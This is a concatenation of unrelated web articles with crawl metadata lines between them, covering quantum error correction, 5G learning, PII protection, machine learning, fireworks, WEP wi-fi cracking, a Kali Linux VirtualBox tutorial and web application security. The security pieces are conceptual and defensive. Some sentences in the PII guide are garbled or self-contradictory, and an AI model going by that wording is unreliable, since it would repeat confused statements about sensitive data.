New Research Tackles Quantum Error Correction (HPC.Wire) Research co-authored by University of Massachusetts Amherst physicist Chen Wang, graduate students Jeffrey Gertler and Shruti Shirol, and postdoctoral researcher Juliang Li takes a step toward building a fault-tolerant quantum computer. They have realized a novel type of QEC where the quantum errors are spontaneously corrected. Today’s computers are built with transistors representing classical bits (0’s or 1’s). Quantum computing is an exciting new paradigm of computation using quantum bits (qubits) where quantum superposition can be exploited for exponential gains in processing power. Fault-tolerant quantum computing may immensely advance new materials discovery, artificial intelligence, biochemical engineering and many other disciplines. The researchers’ experiment achieves passive QEC by tailoring the friction (or dissipation) experienced by the qubit. Because friction is commonly considered the nemesis of quantum coherence, this result may appear quite surprising. The trick is that the dissipation has to be designed specifically in a quantum manner. This general strategy has been known in theory for about two decades, but a practical way to obtain such dissipation and put it in use for QEC has been a challenge. “Although our experiment is still a rather rudimentary demonstration, we have finally fulfilled this counterintuitive theoretical possibility of dissipative QEC,” says Chen.
<urn:uuid:7a336431-f0a4-430e-9db9-7ee8ce73230d>
CC-MAIN-2022-40
https://www.insidequantumtechnology.com/news-archive/new-research-tackles-quantum-error-correction/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00220.warc.gz
en
0.910143
291
2.859375
3
By Karim Husami
The Covid-19 pandemic has changed many aspects of life including education; from the subsequent closure of educational institutions around the world to the rapid adoption of online learning. However, the concept of students studying and learning online started before the spread of the virus with an annual study from the Learning House, a U.S.-based Edtech company, noting that, “the proportion of students studying and learning fully online has risen from under half to fully two-thirds.”
A fast internet connection is one of the main criteria for a successful remote learning experience, therefore, 5G will likely facilitate a more seamless learning experience for students across the world. Remote learning based on new technologies has convinced 80 percent of teachers that this new way empowers their teaching process, according to Houghton Mifflin Harcourt’s fourth annual Educator Confidence Report.
So how can 5G rollout help Edtech?
Allowing students to tap into their imaginative and explorative qualities is an essential step for better learning experiences. Thus, 5G will broaden the scope of technologies used while teaching students new curricula and learning material; for example, it will allow institutions to open availability for virtual and augmented reality with its low latency and peak download speeds, estimated to be as high as 20 gigabits-per-second.
“Virtual and augmented reality headsets will allow students to place themselves anywhere in the world and even within a story. These digital experiences will enliven current curricula and allow students to energize their imaginative and explorative qualities, which should be central to educational experiences,” Nicol Turner-Lee, Ph.D. and a fellow at the Brookings Institution’s Center for Technology Innovation said.
While 5G offers faster data speeds and enhanced connectivity for many, it may not be accessible to students living in remote or secluded areas. Such a limitation may deepen the digital divide. However, wireless devices are easier to put in place than traditional wired or fiber-based internet, making it a more practical solution. Remote learning with 5G is an opportunity to help schools close the homework gap by boosting mobile learning.
“The advent of 5G on mobile devices can help close that gap as students can begin to use faster, more reliable mobile-based connections to complete an assignment, rather than a terrestrial connection,” says Erin Mote, Co-Founder of the Brooklyn Laboratory Charter Schools and Education Technology expert.
Our new educational normal will help students and children with special needs. 5G can help by enabling robots to be responsive with students, offering them good learning experiences, as well as being full-time assistants and supporting teachers by responding instantly to the needs of the student with learning exercises.
However, a big dilemma is presented here: children from high-income families are spending 30 percent more time on distance learning platforms than those from low-income families. In parallel, 64 percent of secondary pupils in state schools from the wealthiest households are being offered online teaching from schools, compared with 47 percent from poorer families, according to a report from the Institute for Fiscal Studies.
<urn:uuid:fee86347-a718-489a-b61b-8b2a0c0c066c>
CC-MAIN-2022-40
https://insidetelecom.com/can-5g-improve-remote-learning-for-all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00220.warc.gz
en
0.952405
765
3.1875
3
It’s very difficult to change the minds of adults on any issue of significance, says author and Harvard psychologist Howard Gardner. But the highest probability of a lasting change of opinion comes when the first six “levers” below are in concert, and the seventh factor, resistances, is low.
1. Reason
The rational approach, involving identifying relevant factors and weighing them. This lever is especially important among those who deem themselves to be educated.
2. Research
Complementing the use of rational argument is the collection of data, which is used to test trends or assertions.
3. Resonance
Whereas reason and research appeal to the cognitive mind, resonance refers to emotions. An opinion or idea resonates when it just “feels right” to a person.
4. Representational redescriptions
The repetition of a point of view in many different forms (linguistic, numerical or graphic) to reinforce the message is one of the most important levers for changing people’s minds, Gardner says.
5. Resources and rewards
Money and other resources can be applied directly (as a bonus, for example) or indirectly (as a donation to a charity as long as the philanthropist’s wishes are adopted). Unless resources and rewards work together with other mind-changing levers, however, a new course of thought is unlikely to last when the money runs out.
6. Real-world events
The use of news stories and events to bolster one’s perspective can be effective in changing minds. Some real-world events, such as the 9/11 terrorist attacks, can affect so many people so deeply that they cause a mass change of mind.
7. Resistances
Barriers to changing one’s mind are created by age (as people get older, their neural pathways are less susceptible to alteration), the emotion that a topic creates and the public stand one has previously taken on a topic.
<urn:uuid:470ca2f0-97e1-4b30-bda7-7d3b2a1e9a80>
CC-MAIN-2022-40
https://www.cio.com/article/272572/change-management-seven-ways-to-effect-change.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00220.warc.gz
en
0.93239
401
3.0625
3
With public concern over online fraud, new research, funded by the Economic and Social Research Council, has revealed that internet users will reveal more personal information online if they believe they can trust the organisation that requests the information. ‘Even people who have previously demonstrated a high level of caution regarding online privacy will accept losses to their privacy if they trust the recipient of their personal information’ says Dr Adam Joinson, who led the study. The findings of the study are vital for those aiming to create online services that pose a potential privacy threat, such as Government agencies involved in developing ID cards. The project found that even those people who declared themselves unconcerned about privacy would soon become opposed to ID cards if the way that they were asked for information made them feel that their privacy was threatened. The ‘Privacy and Self-Disclosure Online’ project is the first of its kind, in that rigorous methods were used to measure internet users actual behaviour. Dr Joinson explains; ‘For the first time we have research which actually analyses what people do online, rather than just looking at what they say they do.’ 56 percent of internet users stated that they have concerns about privacy when they are online. The central issue was whether websites were seen as particularly trustworthy – or untrustworthy – causing users to alter their behaviour. When a website is designed to look trustworthy, people are willing to accept privacy violations. But, the same actions by an untrustworthy site leads to people behaving in a much more guarded manner. In addition, the researchers looked at how the wording of questions and the design of response options further influenced levels of self-disclosure. If the response ‘I prefer not to say’ appears at the top of an options list, users are far less likely to disclose information. Similarly, if given the opportunity to remain vague in their responses, for instance in choosing how wide the scale that represents their salary is, they are more likely to opt for less disclosure – in this case, users tended to opt for a broad scale, such as £10,000 - £50,000 per year. ‘One of the most interesting aspects of our findings,’ says Dr Joinson, ‘is that even people who genuinely have a high level of concern regarding privacy online may act in a way that is contrary to their stated attitudes when they come across a particular set of conditions.’ The implications of this are wide ranging. Many services now require a level of online disclosure. According to this research, how a user assesses the trustworthiness of a website may have a real impact on the success of that service. In addition, research findings will be used to guide policy regarding how the public can be encouraged to make informed choices regarding online privacy. The project has targeted a number of groups who can benefit from the findings, including health professionals, higher education professionals and survey bodies.
<urn:uuid:c89b20a4-5fb1-4577-a431-361c0a451c2d>
CC-MAIN-2022-40
https://www.itproportal.com/2007/11/22/internet-users-give-privacy-exchange-trust/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00220.warc.gz
en
0.965131
591
2.796875
3
You can benefit a lot from being as informed as possible about personally identifiable information (PII), especially because of how it relates to data privacy. It’s common for this data to be used for illegal purposes like identity theft and fraud, so protecting it may literally save your life. So what can you, as an innocent web browser, do to protect yourself? Or if you’re a website owner, how do you protect your users and your company from falling prey to privacy breaches? Read on as we explore PII in more detail and the steps you can take to protect it from bad agents. What Is Personally Identifiable Information (PII) Anyway? While Personally Identifiable Information (PII) has several formal definitions, from a general perspective it’s information that organizations can use to identify, contact, or locate a single person—or to identify an individual in context. In other words, it’s any data that can be used to identify individuals either directly or indirectly. PII includes direct identifiers (passport information, Social Security number, driver’s license, etc.) that can identify a person uniquely, as well as quasi-identifiers (race, zip code, etc.) that can be combined with other quasi-identifiers (date of birth, gender, etc.) to recognize an individual. We’ll discuss these in more detail later. The National Institute of Standards and Technology (NIST) explains PII as: “…any information about an individual maintained by an agency, including any information that can be used to distinguish or trace an individual’s identify such as name, social security number, date and place of birth, mother’s maiden name, or biometric records; and any information that is linked or linkable to an individual with additional information, such as protected health information, educational, financial and employment information.” It’s an organization’s responsibility to ensure compliance with the applicable data protection laws. One of the first steps towards compliance is knowing which data is considered PII (or personal data) and whether it requires additional safeguards. But as there’s no single source of the PII definition, you should instead use individual assessment to correctly determine what PII is (and what it isn’t). Just pay attention to the laws, procedures, regulations, and/or standards governing your specific industry or field, and you’ll have a clearer picture. How Personally Identifiable Information (PII) Works Technological advancements have forever changed data processing and data handling. Businesses operate differently; governments legislate differently; individuals relate differently. Let’s also not forget digital tools like cell phones, ecommerce, social media, and of course, the internet have caused an explosion in the supply of all kinds of data that are known as big data. Big data is a wealth of information that is being collected, analyzed, and processed by businesses and shared by other companies to gain key insights into how to improve customer interaction. However, its emergence has also resulted in a corresponding increase in the number of data breaches and cyberattacks by bad actors who realize the value of this information. The direct result? Regulatory bodies are seeking new laws to protect consumer data while users are trying to figure out anonymous ways to stay digital. Sensitive Personally Identifiable Information vs. Non-Sensitive Personally Identifiable Information You can classify PII into two categories: sensitive and non-sensitive. 
Sensitive personal information includes legal stats, like full name, driver’s license, Social Security number, meeting address, potential information, passport information, credit card information, medical records, and so on. Companies that share data about their clients use various anonymization techniques to encrypt and obfuscate the PII, converting it into a non-personally identifiable form. For instance, an organization that shares its clients’ information with a marketing company will anonymize the sensitive PII in the data, leaving out only that information that’s relevant to the marketing company’s goal. On the other hand, non-sensitive or indirect PII can be accessed from public sources like the internet, phone books, and corporate directories. Some common examples include zip code, gender, race, date of birth, place of birth, and religion. You may have noticed how the examples include quasi-identifiers—something that can generally be safely released to the public. But this doesn’t mean sensitive information cannot be potentially dangerous. You see, although non-sensitive information isn’t delicate, it is linkable. This means that non-sensitive data, when used with other personal linkable information, can reveal the identity of an individual. Moreover, the de-anonymization and re-identification techniques are more likely to be successful when multiple sets of quasi-identifiers are combined together to distinguish one person from another. For example, experts found that 87% of the US population can be uniquely identified by a combination of gender, ZIP code, and date of birth. So even if the US legislation doesn’t consider quasi-identifiers as PII, the European legislation may. Example of a Personally Identifiable Information (PII) Breach Remember how Facebook fell victim to a major data breach back in 2018? Approximately 50 million Facebook user profiles were collected without Facebook‘s consent by an outside company called Cambridge Analytica. The outsider company got the data from the social media platform directly through a researcher who worked at the University of Cambridge, who built a personality quiz in the form of a Facebook app that was designed to take the information from those who volunteered to give access to their data for the quiz. However, not only did the app collect the quiz taker’s data, but it also collected the data of the friends and family members of the quiz takers. Facebook had a loophole in their system due to which over 50 million Facebook users had their data exposed to Cambridge Analytica without their consent. Even though Facebook banned the sale of their data, Cambridge Analytica turned around and sold the data to political consulting companies. Now, many other companies will continue looking for ways to harvest data, especially PII. But they should be met with more stringent regulations so that another debacle like Facebook‘s data breach isn’t repeated. How to Safeguard Your Personally Identifiable Information (PII) Let’s take a look at how you can secure PII against any loss or compromise by preventing a few preventive and corrective measures. Step 1: Identify Your PII and Find Where You Store It The first step is to know whether your company stores or uses PII. Government agencies can store PII like Social Security numbers, passport details, addresses, and license numbers. On the other hand, vendors can have bank details and login information. After identifying all the PII data your company has, you have to figure out where you store it. 
This can include file servers, cloud services, portals, employee laptops, and more. Consider the following: - Data in Use: The data your employees use to do the job, and that’s typically stored in a non-persistent digital state like RAM. - Data at Rest: The data stored or archived in locations like hard drives, databases, laptops, web servers, and SharePoint. - Data in Motion: The data which is transitioning from one location to another, such as data moving from a local storage device to a cloud server, or between two employees via email. You should consider all three data states to develop your PII protection plan. This will help you decide where the PII lives, how it’s used, and the different systems you need to protect. Step 2: Classify All Your PII Data Based on the Sensitivity Next, you have to create a data classification policy to sort your PII data in terms of sensitivity. Since it’s a crucial part of PII protection, you need to do this right. Consider the following factors to classify your PI data: - How unique is your data? If even a single record can identify an individual by itself, that data is highly sensitive. - Can you identify a unique individual by combining two or more pieces of data? - How many people can access your PII data and how frequently is your data transmitted over networks? - Is your data subject to any one of the following regulations: PCI DSS, GDPR, HIPAA, HITECH ACT (US), and the Criminal Justice and Immigration ACT (UK)? After weighing the above factors, you can classify your PII data based on sensitivity. At the very minimum, you should have three levels of data classification: - Restricted. This includes highly sensitive PII that could cause significant damage if it gets in the wrong hands. - Private. While not as sensitive as restricted data, private data can still cause a moderate level of damage to the company or individual if it gets compromised. - Public. Non-sensitive and low-risk data with little to no access restrictions. Data classification can guide your incident response team during a security breach by informing them about the level of information that was compromised. Be sure to delete any old or unnecessary PII to make it inaccessible to cybercriminals. Step 3: Devise an Acceptable Usage Policy (AUP) Not many people do this, but having an AUP can be very helpful to safeguard your sensitive assets. It should cover things like who can access PII and establish clear ground rules regarding an acceptable way to use PII. Your AUP can also serve as a starting place to build technology-based controls to enforce proper PII access and usage. Step 4: Encrypt Your PII and Remove Permission Errors You should always encrypt your PII at rest and in transit to enforce proper PII protection. We recommend using strong encryption and key management before you share PII over an untrusted network or upload it to the cloud. But, to do this, you’ll need the right set of technical controls. You can also automate the encryption process based on data classification to save time. Tracking your access control rights should be next on your list. You should implement and enforce the principle of least privilege when granting access to sensitive data. This will ensure that only those individuals have access to the PII data that need it to do their jobs. Step 5: Remove Internal Threats in the Form of Departing Employees Threats to your company’s data can be internal and external. Disgruntled departing employees are the most common internal threats. 
It’s why you should work on creating a standardized procedure for departing employees: - Delete all user accounts and access to the various enterprise systems to completely remove any access to your system. - Send a legal reminder about the legal responsibilities around PII and other sensitive data. - Share a copy of a signed confidentiality agreement that covers PII and sensitive data. Step 6: Educate Employees on the Importance of Protecting PII Educating employees on the importance of protecting PII is a straightforward and crucial step for PII protection. As your company’s AUP is a vital part of your employee education program, you should ensure every employee has a copy and signs a statement acknowledging that they agree to follow the policies laid out in the document. Another excellent tactic is to have an employee education policy on PII protection to instill a sense of ownership in employees, making them think they do indeed have an important role to play in PII protection. You should also make it easier for employees to report suspicious activity or behavior to management.
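To make Step 4 above (encrypting PII at rest) a little more concrete, here is a minimal sketch using the symmetric-encryption "Fernet" recipe from the widely used Python cryptography package. It illustrates the idea only; in production the key would live in a dedicated key management service rather than in application code, and the example SSN is invented.

```python
# Minimal illustration of encrypting a piece of PII at rest with symmetric
# encryption. Requires the third-party "cryptography" package.
from cryptography.fernet import Fernet

# In production this key would come from a key management service (KMS),
# never be hard-coded, and be rotated on a schedule.
key = Fernet.generate_key()
fernet = Fernet(key)

ssn = "123-45-6789"  # invented example of restricted-level PII

# Store only the ciphertext; the plaintext never needs to touch disk.
ciphertext = fernet.encrypt(ssn.encode("utf-8"))
print("Stored value:", ciphertext)

# Decrypt only when an authorized process actually needs the value,
# in line with the principle of least privilege.
plaintext = fernet.decrypt(ciphertext).decode("utf-8")
assert plaintext == ssn
```

The same pattern applies whether the record lives in a database column, a file share, or a cloud bucket: classify it first, then make sure only ciphertext is ever written to storage.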
<urn:uuid:b771995e-c97d-4be4-9e49-2dcbdfb37dcc>
CC-MAIN-2022-40
https://nira.com/personally-identifiable-information/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00220.warc.gz
en
0.915652
2,435
2.6875
3
References to machine learning (ML) pop up in many contexts, often in connection with artificial intelligence (AI). What’s the difference between ML and AI? IBM data scientists have been developing Watson for many years, and they know a thing or two about both ML and AI. Here are the IBM definitions: Ready or not, we should expect both ML and AI to become a larger part of our lives. The terms AI and ML are often used interchangeably, but ML focuses more on training machines to learn on their own. If you search on “components of machine learning” or “machine learning models,” you’ll see many different answers. Fundamentally, an ML model looks at and learns from big data sources, variables and algorithms. Data can encompass structured and unstructured data – text, images, voice and so on. Variables are the items to be studied – histories of retail purchases, for example. An algorithm is a sequence of steps and instructions that a computer follows to calculate something, solve a problem or complete a task. A main goal of ML projects is to enable tasks to be automated, relieving humans of repetitive or time-consuming activities. ML is behind services such as business decision support, market research, dynamic retail pricing, automated banking, chatbots, virtual assistants and predictions. Cybersecurity companies, for example, rely on ML to help them predict which threats are more or less likely to lead to a security incident. In this use case, ML speeds up threat detection, prioritization and response. Like many technologies, ML has its own jargon. The following terms are a starting point – glossaries can run to 100 terms or more: According to research presented in a Software Strategies blog, enterprises are rapidly adopting ML: Data centers, whether on-premises or colocation, can use ML in areas such as architecture/design, power/cooling management and robotic inspection. Some colocation data centers offer customers the ability to interconnect with a variety of businesses that use AI/ML. Ready to dive more deeply into ML? Check out glossaries at Predictive Analytics World and Google. And, read Artificial Intelligence: The Types, Value and Applications, a blog focused on AI-driven learning at the data center, cloud and edge. The CoreSite Team Combining expertise, research and thought leadership to inform and advance hybrid IT.Read more from this author
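Returning to the blog's point that an ML model combines data, variables, and an algorithm, the toy sketch below trains a classifier to flag "risky" events, loosely echoing the threat-prioritization use case mentioned above. It assumes scikit-learn is installed, and every number and feature name is invented purely for demonstration.

```python
# Toy illustration of the machine-learning workflow described above:
# data (rows of events), variables (features), and an algorithm
# (logistic regression). Requires scikit-learn; the data are invented.
from sklearn.linear_model import LogisticRegression

# Variables per event: [failed_logins, data_sent_MB, off_hours (0/1)]
X = [
    [0, 1, 0],
    [1, 2, 0],
    [9, 50, 1],
    [12, 80, 1],
    [2, 3, 0],
    [8, 40, 1],
]
# Labels learned from history: 1 = led to an incident, 0 = benign.
y = [0, 0, 1, 1, 0, 1]

model = LogisticRegression()
model.fit(X, y)

# Score a new event so analysts can prioritize their response.
new_event = [[7, 35, 1]]
print("Predicted class:", model.predict(new_event)[0])
print("Incident probability:", round(model.predict_proba(new_event)[0][1], 2))
```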
<urn:uuid:19a0a170-9e9c-4268-aa1c-0c8feb843337>
CC-MAIN-2022-40
https://www.coresite.com/blog/what-is-machine-learning
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00220.warc.gz
en
0.940172
498
3.265625
3
Fireworks are one of the biggest parts of the Fourth of July. Most people plan their whole day around finding the best fireworks show in their area. While most people enjoy watching the dazzling and colorful explosions, they do not realize all of the science that goes into creating a fireworks show. The first firework was created by a Chinese monk who filled a piece of bamboo with gunpowder and threw it in a fire to create a bang that would scare the ghosts away. While most of today’s fireworks are more complex than that and are not typically used to scare ghosts, they are made in the same basic way, just using a little more technology. It was not until the Italian Renaissance that steel and charcoal were added to create orange and yellow colors in fireworks. Throughout the years, pyro-technicians have experimented with different metals to create all of the colors that are common in current firework shows. In order to get fireworks to fly as high as they do, technicians load the fireworks into a mortar, which is basically just a small cannon. They then light a fast-burning fuse that lights gunpowder that is stored in a separate bottom compartment of the firework, which sends it flying through the sky. The fireworks themselves are made up of different shells. The first is usually made of plastic or paper, which holds everything together. These shells are stuffed full of gunpowder, which has explosive spheres known as “stars” embedded. These stars are what become the points of light when the firework explodes. The different metals that the stars are coated with determine what color the firework is. Inside the firework is a time delay fuse, which is lit at the same time as the fast-burning fuse, which sends the firework flying, but it takes much longer to reach the gunpowder that is inside the firework. The length of the fuse determines how high the firework will be when it explodes. One of the down sides to these large explosions is that they are not easily caught on film, especially by smartphones. Luckily, there is new technology which helps you capture firework bursts. The app “LightBomber” gives your phone camera a long exposure, which will allow it to capture all the magic of the different fireworks. It also offers a “light trail” mode that will capture color bursts that look as real as seeing the fireworks in real life. D&D Security Resources would like to wish you and your family a fun and safe 4th of July, and encourage you to contact them for all of your security resource needs.
<urn:uuid:6260c920-0f0c-49ef-b308-e06d13347d33>
CC-MAIN-2022-40
https://ddsecurity.com/2014/07/02/technology-behind-fourth-of-july-fireworks/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00220.warc.gz
en
0.972385
528
2.75
3
What is a virtual machine? A virtual machine (VM) is a logical machine inside your computer that works like a physical machine (a real computer). It is created with virtualization software such as VirtualBox or VMware; VirtualBox is a good choice and is free. You can create virtual machines for Windows, Linux, macOS, and other operating systems. When you create a virtual machine, it is like a fresh computer without an operating system: it has most hardware devices virtually, such as a hard drive, DVD writer, LAN card, and so on. Is that amazing? Yes, of course, because you are going to run a virtual computer inside your real computer. That means you can run multiple computers at the same time, such as Windows 8, Windows 10, Kali Linux, Ubuntu, and more. If that sounds interesting, continue reading. Why create a virtual machine for Kali Linux? Kali Linux is an advanced penetration testing and security auditing Linux distribution. You can use a Kali Linux live CD or flash drive for penetration testing, but Kali Linux is updated regularly with new tools. To get new tools as soon as they arrive, it is better to install Kali Linux in VirtualBox and then update and upgrade it, along with its tools, over time. Before installing Kali Linux you have to create the virtual machine correctly inside VirtualBox or VMware. How to create a virtual machine for Kali Linux: If you are interested in learning new things, this tutorial is for you. With virtual machines you can set up a virtual lab inside a single computer. First we are going to create a virtual attacker machine (Kali Linux). Virtual machine requirements: Before you start creating the virtual machine, VirtualBox should be installed on your system. If you don't know how to install VirtualBox on Windows, see Installing VirtualBox on Microsoft Windows 7 & 8. To create the virtual machine for Kali Linux, follow these steps. Step 1: Open VirtualBox. Step 2: Click on New. A new window will pop up with three fields to fill in: Name, Type, and Version. Step 3: Fill in the following: Name: Kali Linux; Type: Linux; Version: Debian 32-bit or 64-bit (according to your system architecture). Step 4: In the next window, set the virtual memory (RAM) of the machine. 1024 MB is enough for Kali Linux, so assign 1024 MB of RAM and click the Next button. Step 5: In the next window, create a virtual hard drive. Select "Create a virtual hard drive now", then click the Create button. Step 6: Select the file type of the hard drive (the format in which the drive file will be saved). VMDK (Virtual Machine Disk) is recommended because it is also supported by VMware. Then click the Next button. Step 7: Select "Dynamically allocated". With this option you can resize the hard drive later as needed. Click Next to reach the next step. Step 8: There are two options in this window: first give the location where you want to save the hard drive file, then set the size of the hard drive to 20 GB (it can be extended later) for Kali Linux, and click the Create button.
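The same machine can also be created without clicking through the wizard. The sketch below drives VirtualBox's command-line tool, VBoxManage, from Python as a rough equivalent of Steps 1-8. It assumes VBoxManage is on your PATH, and flag names can differ slightly between VirtualBox versions, so treat it as a sketch and check `VBoxManage --help` on your system before relying on it.

```python
# Rough command-line equivalent of the wizard steps above, driving
# VBoxManage from Python. Assumes VirtualBox is installed and VBoxManage
# is on the PATH; flags may vary slightly between VirtualBox versions.
import subprocess

VM = "Kali Linux"
DISK = "kali-linux.vmdk"

commands = [
    # Steps 2-3: create and register the VM with the Debian 64-bit profile.
    ["VBoxManage", "createvm", "--name", VM, "--ostype", "Debian_64", "--register"],
    # Step 4: give the VM 1024 MB of RAM.
    ["VBoxManage", "modifyvm", VM, "--memory", "1024"],
    # Steps 5-8: create a 20 GB dynamically allocated VMDK disk.
    ["VBoxManage", "createmedium", "disk", "--filename", DISK,
     "--size", "20480", "--format", "VMDK"],
    # Attach the disk to a SATA controller so the VM can boot from it later.
    ["VBoxManage", "storagectl", VM, "--name", "SATA", "--add", "sata"],
    ["VBoxManage", "storageattach", VM, "--storagectl", "SATA",
     "--port", "0", "--device", "0", "--type", "hdd", "--medium", DISK],
]

for cmd in commands:
    print("Running:", " ".join(cmd))
    subprocess.run(cmd, check=True)
```

Scripting the setup this way is handy when you rebuild the lab often, since the whole attacker machine can be recreated with one command.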
<urn:uuid:c59d4f11-8cb6-4b9d-9277-53d6d2bd81f2>
CC-MAIN-2022-40
https://www.cyberpratibha.com/blog/how-to-create-virtual-machine-for-kali-linux/?amp=1
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00220.warc.gz
en
0.806438
737
2.9375
3
Many home internet users rely on an encryption system called Wired Equivalent Privacy (WEP) to stop others using their wi-fi link, even though WEP has long been known to be flawed. In early April three cryptographic researchers at the Darmstadt Technical University in Germany revealed a method of exploiting the flaws far more effectively.
Before now it took at least 20 minutes of monitoring the airwaves before it was possible to break into a wireless network protected by WEP. Now, armed with a program written by the researchers, it is possible to break into the same network far faster.
"Breaking into a WEP-protected network is now very easy to do," said Erik Tews, one of the researchers. "Doing it in 60 seconds is realistic, or five minutes in the very worst case. We think now that WEP is really dead and we recommend that no-one should use it."
In its place he recommends an encryption system called Wi-Fi Protected Access (WPA), introduced four years ago to replace WEP.
"We have had a very close look at WPA and we can't find anything to exploit," he said.
<urn:uuid:bd3fb8af-b4de-4f29-baae-a252572a3f2c>
CC-MAIN-2022-40
https://forums.cabling-design.com/wireless/news-breaking-wep-in-minutes-or-even-seconds-45948-.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00420.warc.gz
en
0.959729
270
2.984375
3
PER CASO D’USO Web application security is the group of technologies, processes, and methods used to protect web applications, servers, and web services from a cyber attack. Web application security products and services use tools and practices such as multi-factor authentication (MFA), web application firewalls (WAFs), security policies, and identity validation to maintain user privacy and prevent intrusions. Explore additional web application security topics: Secure your apps with a zero-trust security solution Web application security is critical to protect data, customers, and systems from intrusions and data breaches that damage business continuity. Today, where there is an application for everything from remote working to banking, attackers find applications to be a prime target. Cybercriminals exploit vulnerabilities, such as design flaws, weaknesses in APIs, open-source code, or widgets, and they’re getting smarter and more organized. The safety of a business will ultimately depend on how quickly security teams can detect and fix security vulnerabilities in the development process. Therefore, it is critical to use application security tools that integrate into your application development environment. Attackers use a wide array of methods to target application vulnerabilities. Here are some of them: These are only some of the attack vectors cybercriminals use to target applications. With cybercrime on the rise, protecting applications from threats is crucial to limit the monetary and business impact. There are different approaches to web application security, depending on the vulnerabilities being addressed. For instance, web application firewalls (WAFs) are some of the most comprehensive tools. WAFs filter the traffic between the web application and any user that intends to access it. A WAF uses policies that help determine what traffic is safe and what isn’t, block malicious traffic attempts, and prevent attackers from reaching the application. WAFs also block the app from releasing unauthorized data. As DDoS (Distributed Denial of Service) attacks become more prevalent, organizations need to implement methods to protect their web applications from these attacks. Ransom DDoS attacks, in particular, are on the rise, where attackers ask for money to stop an ongoing attack or prevent an upcoming threat. The effects of a DDoS can be devastating, with the potential for huge revenue loss and serious business disruption. An effective DDoS mitigation service needs to not only filter and block suspicious traffic, but must also be intelligent enough to detect and allow legitimate traffic to pass. Another vector of attack to be aware of is malicious bots that are used to access web APIs and properties. Once the bot is inside the network it can take control, deploying code or making attacks such as DDoS and SQL injection. A bot management tool can detect and block malicious bot traffic, mitigating the risk of bot attacks. Application security testing (AST) is a method of making applications safer against security threats by identifying security vulnerabilities in source code. Originally, AST was a manual process, but the increasing complexity of enterprise software—with huge numbers of open source components prone to known vulnerabilities—made it necessary for AST to be automated. Most organizations combine different application security tools at different stages of the software development lifecycle. 
Application security testing can be categorized as static or dynamic, each of which addresses different security weaknesses. There are several tools and techniques: SAST tools inspect the static source code of an application and report on any security weaknesses found. You can apply static testing tools to uncompiled code, and they find issues like syntax errors, math errors, and invalid or insecure references. DAST tools inspect the code while it's running, detecting indicators of security vulnerabilities, for instance issues with query strings, requests and responses, use of scripts, memory leaks, data injection, and more. You can use DAST tools to conduct scans simulating large numbers of malicious cases and record the application's response. IAST tools combine SAST and DAST techniques to improve the detection of security threats. IAST tools inspect the software at runtime, but they run from the application server, so they can also inspect compiled sources. You can use IAST tools to learn about the root cause of vulnerabilities and which specific lines of code are involved, making them easier to remediate. In addition to automated application security testing, security analysts use manual penetration testing to simulate attacks against a running application. Pen testers use various tools to simulate the attacks, including DAST or SAST tools. Here are some tips and best practices that can help you protect your applications from cyberattacks: Encryption is essential as companies move to digital transformation. This is a simple step that doesn't require complex web application security tools but is often overlooked by organizations. Attackers will take advantage of any unencrypted HTTP requests and mislead users. By enforcing HTTPS, you make it safe to transfer data between users and servers, eliminating another potential attack vector. Traditionally, security professionals would use a vulnerability scanner and then manually conduct additional testing using security tools. However, this approach is now insufficient to face the volume and complexity of attacks. Current security tools integrate automation capabilities that prevent errors and issues early in the software development lifecycle, saving a lot of time and simplifying remediation. DDoS (distributed denial of service) attacks are a popular attack vector against applications. Attackers use malicious yet seemingly legitimate requests to consume and overload application resources. A web application security tester would take steps to identify this malicious behavior and prevent damage. DDoS protection services help detect and mitigate web application layer DDoS attacks by inspecting and diverting traffic. Secure code practices help developers make fewer errors when writing code. They also help you detect and eliminate errors early in the software development lifecycle. Developers should understand how attackers exploit vulnerabilities and misconfigurations. Scanning for security vulnerabilities early in the software development life cycle (SDLC) helps detect and fix issues before attackers can exploit them. This is done using web application security tools that integrate into DevOps pipelines and inform developers of vulnerabilities as soon as they commit new code to the repository. Citrix Web App and API Protection is now offered as a cloud service. The all-in-one platform delivers holistic and layered protection against known and zero-day attacks.
It includes an integrated web application firewall (WAF), bot management, and a DDoS mitigation service. The more disparate applications you deploy, the higher the risk of a fragmented security posture. The Citrix platform offers consistent security across the entire app ecosystem and all environments.
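To make the secure-coding guidance above concrete, here is a minimal, hypothetical sketch (not part of any Citrix product) contrasting a query built by string concatenation, the classic injection flaw a SAST tool would flag, with a parameterized query. The table and column names are illustrative assumptions.

```python
import sqlite3

def find_user_unsafe(conn, username):
    # Vulnerable: user input is concatenated into the SQL string,
    # so input like "x' OR '1'='1" changes the query's meaning.
    query = "SELECT id, email FROM users WHERE name = '" + username + "'"
    return conn.execute(query).fetchall()

def find_user_safe(conn, username):
    # Parameterized query: the driver treats the input strictly as data,
    # which is the remediation a SAST or DAST finding would point to.
    query = "SELECT id, email FROM users WHERE name = ?"
    return conn.execute(query, (username,)).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.execute("INSERT INTO users (name, email) VALUES ('alice', 'alice@example.com')")
    malicious = "x' OR '1'='1"
    print("unsafe:", find_user_unsafe(conn, malicious))  # returns every row
    print("safe:  ", find_user_safe(conn, malicious))    # returns nothing
```

The same principle, keeping untrusted input strictly separate from code, underlies most of the injection defenses discussed above.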
